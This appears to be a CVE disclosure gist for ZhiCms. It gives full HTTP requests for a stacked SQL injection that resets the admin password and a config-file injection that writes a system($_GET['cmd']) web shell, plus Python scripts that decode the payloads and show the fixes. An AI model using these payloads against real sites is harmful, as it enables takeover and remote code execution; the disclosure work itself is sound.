
@L1nyz-tel
Last active March 27, 2024 02:44
  • Save L1nyz-tel/e3ee6f3401a9d1c580be1a9b4a8afab5 to your computer and use it in GitHub Desktop.
ZhiCms CVE Report

source code in

In the function app/index/controller/mcontroller.php#getindexdata, the search term from the key parameter is concatenated into the SQL text, and the resulting query is executed through a path that accepts several statements at once. This is a stacked SQL injection: an attacker can terminate the intended statement and append further statements of their own, separated by ;.

Sending the following request resets the admin password to "admin". The key value is URL-encoded twice; once both layers are removed it closes the LIKE string of the original query, runs an UPDATE against yun_manage that replaces the password hash of the row with id 1, and then starts a fresh SELECT so that the quote the application appends afterwards still parses:

POST /index.php?r=index/m/getindexdata HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 289
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://127.0.0.1:8888
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8888/index.php?r=manage/login/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=gclnhtp52rldnj5p9ckp389h2h
Connection: close

action=search&key=%2525%2527%253Bupdate%2520yun%255Fmanage%2520set%2520password%253D%2527bbe375100175e7b98339a98e0a07083b%2527%2520where%2520id%253D%25271%2527%253BSELECT%2520%252A%2520FROM%2520%2560yun%255Farticle%2560%2520%2520WHERE%2520%2560title%2560%2520LIKE%2520%2520%2527%2525&mall=

The admin login page at http://127.0.0.1:8888/index.php?r=manage/login/index then accepts admin/admin, which gives access to the backend.
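As an added example (not code from this report or from ZhiCms), the Python script below decodes the key value from the request above and replays the concatenation against an in-memory SQLite database standing in for MySQL. The table columns, the exact text of the vulnerable query, and the use of sqlite3's executescript() as a stand-in for a multi-statement MySQL call are assumptions; the payload and the yun_manage / yun_article table names are taken from the request.

```python
"""Added example, not ZhiCms code: what the double-URL-encoded `key` value
becomes, and why string concatenation plus multi-statement execution lets it
overwrite the admin password.  Schema and query shape are assumptions."""
import sqlite3
from urllib.parse import unquote

# The `key` parameter exactly as it appears in the report's request body.
RAW_KEY = ("%2525%2527%253Bupdate%2520yun%255Fmanage%2520set%2520password%253D"
           "%2527bbe375100175e7b98339a98e0a07083b%2527%2520where%2520id%253D"
           "%25271%2527%253BSELECT%2520%252A%2520FROM%2520%2560yun%255Farticle"
           "%2560%2520%2520WHERE%2520%2560title%2560%2520LIKE%2520%2520%2527%2525")

ORIGINAL_HASH = "original-hash-placeholder"   # constructed sample value


def decode_key(raw: str) -> str:
    """Remove both layers of URL encoding: the web server strips one, and
    the application is assumed to strip the second before building SQL."""
    return unquote(unquote(raw))


def statements(key: str) -> list:
    """Split the decoded payload into the statements the server will see."""
    return [s.strip() for s in key.split(";")]


def fresh_db() -> sqlite3.Connection:
    """Constructed sample schema: one admin row and one article row."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE yun_manage(id TEXT, username TEXT, password TEXT);
        CREATE TABLE yun_article(id INTEGER, title TEXT);
        INSERT INTO yun_article VALUES (1, 'hello world');
    """)
    db.execute("INSERT INTO yun_manage VALUES ('1', 'admin', ?)", (ORIGINAL_HASH,))
    return db


def admin_hash(db: sqlite3.Connection) -> str:
    return db.execute("SELECT password FROM yun_manage WHERE id='1'").fetchone()[0]


def vulnerable_search(db: sqlite3.Connection, key: str) -> str:
    """Assumed shape of the flawed query: the search term is spliced into the
    SQL text and the whole text goes to an executor that runs every statement
    it contains (executescript() plays that role here)."""
    sql = "SELECT * FROM `yun_article` WHERE `title` LIKE '%" + key + "%'"
    db.executescript(sql)            # the injected UPDATE runs as well
    return admin_hash(db)


def safe_search(db: sqlite3.Connection, key: str) -> str:
    """Same search with a bound parameter: the term is data, never SQL."""
    db.execute("SELECT * FROM `yun_article` WHERE `title` LIKE ?",
               ("%" + key + "%",)).fetchall()
    return admin_hash(db)


if __name__ == "__main__":
    decoded = decode_key(RAW_KEY)
    print("decoded key :", decoded)
    for i, stmt in enumerate(statements(decoded), 1):
        print(f"statement {i}:", stmt)
    print("vulnerable  :", vulnerable_search(fresh_db(), decoded))
    print("parameterised:", safe_search(fresh_db(), decoded))
```

The decoded payload is three statements: the fragment that closes the original LIKE string, the UPDATE that swaps in the new hash, and a SELECT that re-creates the original query so the trailing quote and wildcard appended by the application still form valid SQL. With a bound parameter the same text is matched as a literal title pattern and the admin row is untouched. On MySQL, stacked statements only execute through an API that allows them (for example mysqli_multi_query() or PDO with multi-statement support left enabled), so that the report's payload works also tells you which kind of call the controller uses.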

Furthermore, in the function app/manage/controller/setcontroller.php#index (part of the backend reached above), the submitted site settings are concatenated into PHP source code and written to data/config/siteconfig.php without being escaped. A value containing a quote can therefore close the string literal it lands in and inject arbitrary PHP into the file.

The following request, sent with the admin session, closes the string and writes a web shell. The sitename value decodes to ');system($_GET['cmd']);/* : the leading ') closes the string literal and the expression it sits in, system($_GET['cmd']) executes whatever arrives in the cmd query parameter, and the trailing /* comments out whatever the template emits after the value, up to the next */:

POST /index.php?r=manage/set/index HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 229
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://127.0.0.1:8888
Referer: http://127.0.0.1:8888/index.php?r=manage/set/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=96d562012a5fde8577cbd6ea765d69ed
Connection: close

sitename=')%3Bsystem(%24_GET%5B'cmd'%5D)%3B%2F*&hosturl=&logo=public%2Fweb%2Fimages%2Flogoh2014r.png&ewm=public%2Fweb%2Fimages%2Flogoh2014r.png&appkey=&secretKey=&pid=&apiurl=https%3A%2F%2Fopen.push.red%2F&code=&zhuan=0&download=

Requesting the rewritten config file with a cmd parameter then executes the command, giving remote code execution. The spaces in the example URL must be percent-encoded (%20) if the request is sent with a tool such as curl, and open -a Calculator is a macOS command, so substitute one that suits the target:

http://127.0.0.1:8888/data/config/siteconfig.php?cmd=open -a Calculator
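As an added example (not code from this report or from ZhiCms), the script below rebuilds the sitename payload and pushes it through two small config writers: one that pastes values straight into PHP source the way the vulnerable controller does, and one that emits each value as an escaped PHP single-quoted literal, the same escaping var_export() applies. A minimal lexer then reports which function calls end up in code context rather than inside a string or comment. The array-shaped template is an assumption; the layout of the real siteconfig.php is not shown in the report.

```python
"""Added example, not ZhiCms code: how an unescaped settings value breaks out
of a generated PHP config file, and what escaping it as a string literal
changes.  The template is an assumed shape of data/config/siteconfig.php."""
from urllib.parse import unquote

# `sitename` exactly as sent in the report's request body.
RAW_SITENAME = "')%3Bsystem(%24_GET%5B'cmd'%5D)%3B%2F*"


def decoded_sitename() -> str:
    """The value after the web server's single URL decode."""
    return unquote(RAW_SITENAME)


def php_single_quoted(value: str) -> str:
    """Escape for a PHP '...' literal: inside single quotes only backslash
    and the quote itself are special (this mirrors var_export() for strings)."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def vulnerable_config(sitename: str, hosturl: str = "") -> str:
    """Assumed flawed writer: values are pasted straight into PHP source."""
    return ("<?php\n"
            "return array(\n"
            "    'sitename' => '" + sitename + "',\n"
            "    'hosturl' => '" + hosturl + "',\n"
            ");\n")


def safe_config(sitename: str, hosturl: str = "") -> str:
    """Same writer with every value emitted as an escaped string literal."""
    return ("<?php\n"
            "return array(\n"
            "    'sitename' => " + php_single_quoted(sitename) + ",\n"
            "    'hosturl' => " + php_single_quoted(hosturl) + ",\n"
            ");\n")


def code_context_calls(src: str) -> list:
    """Tiny PHP lexer: names of function calls that land in code context,
    i.e. outside '...' and "..." literals and outside // and /* */ comments.
    An unterminated /* is treated as running to end of file."""
    calls, i, n = [], 0, len(src)
    while i < n:
        c = src[i]
        if c in ("'", '"'):                     # string literal
            quote, i = c, i + 1
            while i < n and src[i] != quote:
                i += 2 if src[i] == "\\" else 1  # skip escaped characters
            i += 1
        elif src.startswith("//", i):           # line comment
            nl = src.find("\n", i)
            i = n if nl < 0 else nl
        elif src.startswith("/*", i):           # block comment
            end = src.find("*/", i + 2)
            i = n if end < 0 else end + 2
        elif c.isalpha() or c == "_":           # identifier; '(' after it means a call
            j = i
            while j < n and (src[j].isalnum() or src[j] == "_"):
                j += 1
            if j < n and src[j] == "(":
                calls.append(src[i:j])
            i = j
        else:
            i += 1
    return calls


if __name__ == "__main__":
    value = decoded_sitename()
    print("decoded sitename:", value)
    print("--- vulnerable writer ---")
    print(vulnerable_config(value))
    print("calls in code context:", code_context_calls(vulnerable_config(value)))
    print("--- escaping writer ---")
    print(safe_config(value))
    print("calls in code context:", code_context_calls(safe_config(value)))
```

With the vulnerable writer the lexer finds system in code context: the ') ends the string and the array() expression, and the /* hides the rest of the template. With the escaping writer the quotes inside the value become \' and the whole payload stays a harmless string. Whether the remainder of the real siteconfig.php still parses after the injected /* depends on what the real template emits after the value; the report shows that it does on the affected version. Storing settings in a data format (JSON, or serialize()) instead of generated PHP removes the problem entirely.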